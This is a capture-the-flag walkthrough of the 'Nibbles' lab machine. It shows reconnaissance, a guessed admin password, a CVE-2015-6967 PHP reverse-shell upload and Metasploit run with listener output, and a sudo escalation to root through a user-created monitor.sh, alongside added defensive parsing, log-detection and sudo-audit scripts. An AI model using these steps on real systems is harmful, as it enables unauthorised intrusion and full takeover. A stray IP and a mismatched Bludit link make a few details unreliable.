Nibbles

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.75  

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.75  

Not shown: 1000 closed udp ports (port-unreach)
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.75      

We get back the following result showing that two ports are open:

  • Port 80: running Apache httpd 2.4.18

  • Port 22: running OpenSSH 7.2p2

Enumeration: Website - Port 80

Visit the site in the browser. http://10.10.10.75/

Nothing useful there, so right click and select View Page Source (or press CTRL + U). We find a comment that gives us a new directory.

This leads us to the following page. You can see at the bottom that it is powered by Nibbleblog. This indicates that it is off-the-shelf software as opposed to custom software.

http://10.10.10.75/nibbleblog/
http://10.10.10.134/nibbleblog/feed.php

To confirm that, let’s google Nibbleblog (the footer reads "Powered by Nibbleblog"; https://www.bludit.com/).

Gobuster:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.75/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.75/nibbleblog

/index.php            (Status: 200) [Size: 2987]
/sitemap.php          (Status: 200) [Size: 402]
/.php                 (Status: 403) [Size: 301]
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/feed.php             (Status: 200) [Size: 302]
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php          (Status: 200) [Size: 78]
/update.php           (Status: 200) [Size: 1622]
/README               (Status: 200) [Size: 4628]
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
/LICENSE.txt          (Status: 200) [Size: 35148]
/COPYRIGHT.txt        (Status: 200)

Identifying a username

Digging deeper, several files under /nibbleblog/ are readable without authentication. The most useful is /nibbleblog/content/private/users.xml, which reveals a user, admin, as well as the IPs that have tried to log in as it.

http://10.10.10.75/nibbleblog/update.php
DB updated: ./content/private/config.xml
DB updated: ./content/private/comments.xml

http://10.10.10.75/nibbleblog/README
Version: v4.0.3
===== About the author =====
Name: Diego Najar
E-mail: dignajar@gmail.com
Linkedin: http://www.linkedin.com/in/dignajar

http://10.10.10.75/nibbleblog/content/private/config.xml
<notification_email_to type="string">admin@nibbles.com</notification_email_to>
<notification_email_from type="string">noreply@10.10.10.134</notification_email_from>

http://10.10.10.75/nibbleblog/content/
http://10.10.10.75/nibbleblog/admin/controllers/

http://10.10.10.75/nibbleblog/content/private/users.xml
<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">2</session_fail_count>
<session_date type="integer">1703672877</session_date>
</user>
<blacklist type="string" ip="10.10.10.1">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
<blacklist type="string" ip="10.10.16.4">
<date type="integer">1703672861</date>
<fail_count type="integer">2</fail_count>
</blacklist>
</users>
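As an added example (not part of the original writeup), the following script parses a Nibbleblog users.xml like the one above and summarises what an unauthenticated reader learns from it, which is the information a defender would put in a finding about content/private/ being web-readable. The XML is the page's own sample, embedded as a constant so the script runs offline.

```python
# Added example: parse Nibbleblog's content/private/users.xml and report the
# usernames and throttled source IPs it discloses. USERS_XML is the sample
# shown on this page, embedded so the script runs without a target.
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

USERS_XML = """<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">2</session_fail_count>
<session_date type="integer">1703672877</session_date>
</user>
<blacklist type="string" ip="10.10.10.1">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
<blacklist type="string" ip="10.10.16.4">
<date type="integer">1703672861</date>
<fail_count type="integer">2</fail_count>
</blacklist>
</users>"""


def parse_users_xml(text):
    """Return (accounts, blacklist): accounts maps username -> recent failed
    logins; blacklist maps source IP -> (fail_count, last attempt in UTC)."""
    root = ET.fromstring(text)
    accounts = {}
    for user in root.findall("user"):
        accounts[user.get("username")] = int(user.findtext("session_fail_count", "0"))
    blacklist = {}
    for entry in root.findall("blacklist"):
        when = datetime.fromtimestamp(int(entry.findtext("date")), tz=timezone.utc)
        blacklist[entry.get("ip")] = (int(entry.findtext("fail_count", "0")), when)
    return accounts, blacklist


def exposure_report(text):
    """One line per disclosed fact: each valid username, then each IP that has
    been throttled for guessing a password against it."""
    accounts, blacklist = parse_users_xml(text)
    lines = [f"valid username disclosed: {u} ({n} recent failed logins)"
             for u, n in accounts.items()]
    for ip, (n, when) in blacklist.items():
        lines.append(f"login attempts from {ip}: {n} failures, last {when:%Y-%m-%d %H:%M:%S} UTC")
    return lines


if __name__ == "__main__":
    print("\n".join(exposure_report(USERS_XML)))
```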

Logging into admin panel

I wasn’t able to locate a password elsewhere on the blog, and nibbleblog doesn’t have a default password. Luckily, the guess of nibbles worked, and we are in:

http://10.10.10.75/nibbleblog/admin.php admin nibbles

Remote Code Execution (via file upload):

From the gobuster results, there’s a README file, and that gives us a version:

http://10.10.10.75/nibbleblog/README Version: v4.0.3

This version of Nibbleblog is vulnerable to CVE-2015-6967, an authenticated arbitrary file upload that can lead to code execution. There’s a Metasploit module for it, and it’s also straightforward to do manually.

CVE-2015-6967:

Now we need admin credentials. When I’m presented with an enter credentials page, the first thing I try is common credentials (admin/admin, admin/nibbles, nibbles/nibbles, nibbles/admin). If that doesn’t work out, I look for default credentials online that are specific to the technology. Last, I use a password cracker if all else fails.

http://10.10.10.75/nibbleblog/admin.php admin nibbles

Next, we need to navigate to the My Image plugin. Click on Plugins > My image > Configure.

http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

Get the code for a PHP reverse shell. Change the IP address and port to those of your attack machine. Then save it in a file called image.php and upload it through the plugin.

Start a listener on the above chosen port.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555

In the browser, navigate to the image we just uploaded to run the reverse shell script.

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.75] 57330

Let’s first upgrade to a better shell. The python binary is not present, but python3 is.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
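From the defender's side, the sequence above leaves a recognisable trace in the Apache access log: a POST to the My Image plugin configuration page followed by a request for a .php file inside content/private/plugins/my_image/. The following detection is an added example (not part of the original writeup); the log lines are constructed samples whose paths mirror the ones used on this page.

```python
# Added example: flag the CVE-2015-6967 upload-then-execute pattern in Apache
# combined-format access logs. SAMPLE_LOG is constructed; the paths match the
# ones used in this writeup, the client IPs are made up.
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# the plugin configuration endpoint that accepts the upload
UPLOAD_PATH = "/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image"
# anything ending in .php served from the plugin's upload directory
WEBSHELL_RE = re.compile(
    r"^/nibbleblog/content/private/plugins/my_image/[^/?]+\.php", re.I)

SAMPLE_LOG = """\
10.10.16.4 - - [27/Dec/2023:10:31:02 +0000] "GET /nibbleblog/admin.php HTTP/1.1" 200 1401 "-" "Mozilla/5.0"
10.10.16.4 - - [27/Dec/2023:10:32:15 +0000] "POST /nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image HTTP/1.1" 200 3520 "-" "Mozilla/5.0"
10.10.16.4 - - [27/Dec/2023:10:32:40 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.9 - - [27/Dec/2023:10:33:01 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.jpg HTTP/1.1" 200 8312 "-" "Mozilla/5.0"
"""


def detect_my_image_webshell(log_text):
    """Return one finding per request for a PHP file in the My Image upload
    directory: the client that fetched it, the path, and every client that
    POSTed to the plugin config page earlier in the log."""
    uploaders, findings = set(), []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line we understand; skip rather than crash
        ip, method, path = m["ip"], m["method"], m["path"]
        if method == "POST" and path == UPLOAD_PATH:
            uploaders.add(ip)
        elif WEBSHELL_RE.match(path):
            findings.append({"client": ip, "path": path,
                             "uploaded_by": sorted(uploaders)})
    return findings


if __name__ == "__main__":
    for f in detect_my_image_webshell(SAMPLE_LOG):
        print(f)
```

A legitimate image request (image.jpg, last sample line) is not reported; only a PHP file in that directory is.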

Metasploit –> Meterpreter

We’ll use multi/http/nibbleblog_file_upload to get a shell on the box.

┌──(kali💀kali)-[~]
└─$ msfconsole

msf6 > use multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > info
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.16.4
msf6 exploit(multi/http/nibbleblog_file_upload) > run

meterpreter > shell
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

user.txt:

From there, we’ll upgrade our shell, and then get user.txt:

python3 -c 'import pty;pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ 
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home
nibbler@Nibbles:/home$ cd nibbler
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
455db----------------------------------

Privilege Escalation

Find out what privileges we have. Whether by running LinEnum.sh or simply by checking sudo -l, we see the following:

nibbler@Nibbles:/home/nibbler$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

If we try to access it, we find that the personal directory does not exist. That is not a dead end: the path sits under our own home directory, so we can create it ourselves and put our own script there:

cd /home/nibbler
mkdir personal
mkdir personal/stuff
cd /home/nibbler/personal/stuff

Now that the directories are ready, let’s create the script. nano is not installed, so we use vi:

nibbler@Nibbles:/home/nibbler/personal/stuff$ vi monitor.sh

When vi opens, press i to enter insert mode, then paste this script:

#!/bin/sh
bash

Then press ESC, type :wq, and press Enter to save and exit:

nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
#!/bin/sh
bash

The script is ready; the last thing to do is give it execute permission:

nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh

Then run it with sudo:

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# whoami
whoami
root
root@Nibbles:/home# cat /root/root.txt
cat /root/root.txt
8ece72-----------------------------
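The root cause here is a sudoers rule whose target the invoking user controls. As an added example (not part of the original writeup), the audit below takes a sudo command path and the user's home directory and reports why the rule is unsafe: target under the user's home, target missing (so the user can create it), or target or any existing parent writable by the user. The helper names and the demo() scratch layout are assumptions made for this example.

```python
# Added example: audit a NOPASSWD sudo target the way a defender would after
# seeing `sudo -l` output like the one above. audit_sudo_target() and demo()
# are hypothetical helpers; demo() recreates the Nibbles layout in a scratch
# directory rather than touching /home/nibbler.
import os
import stat
import tempfile


def _writable_by_user(path, uid, gids):
    """True if this uid (or one of its gids, or everyone) may write the entry."""
    st = os.lstat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def audit_sudo_target(target, home, uid=None, gids=None):
    """Return the reasons the rule is unsafe; an empty list means none found."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)
    target, home = os.path.realpath(target), os.path.realpath(home)
    reasons = []
    if target == home or target.startswith(home + os.sep):
        reasons.append("target is inside the invoking user's home directory")
    if not os.path.exists(target):
        reasons.append("target does not exist: user can create it")
    # Walk from the target up to /: any existing component the user can write
    # lets them replace the script (missing components are reported above).
    path = target
    while True:
        if os.path.lexists(path) and _writable_by_user(path, uid, gids):
            reasons.append(f"{path} is writable by uid {uid}")
        parent = os.path.dirname(path)
        if parent == path:
            break
        path = parent
    return reasons


def demo():
    """Rule points at personal/stuff/monitor.sh under a fresh home that lacks
    those directories, exactly the situation on Nibbles."""
    home = tempfile.mkdtemp(prefix="nibbler-home-")
    target = os.path.join(home, "personal", "stuff", "monitor.sh")
    return audit_sudo_target(target, home)


if __name__ == "__main__":
    print("\n".join(demo()))
```

The fix on a real host is to point the rule at a root-owned script in a root-owned directory (for example under /usr/local/sbin) rather than at a path under the user's home.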
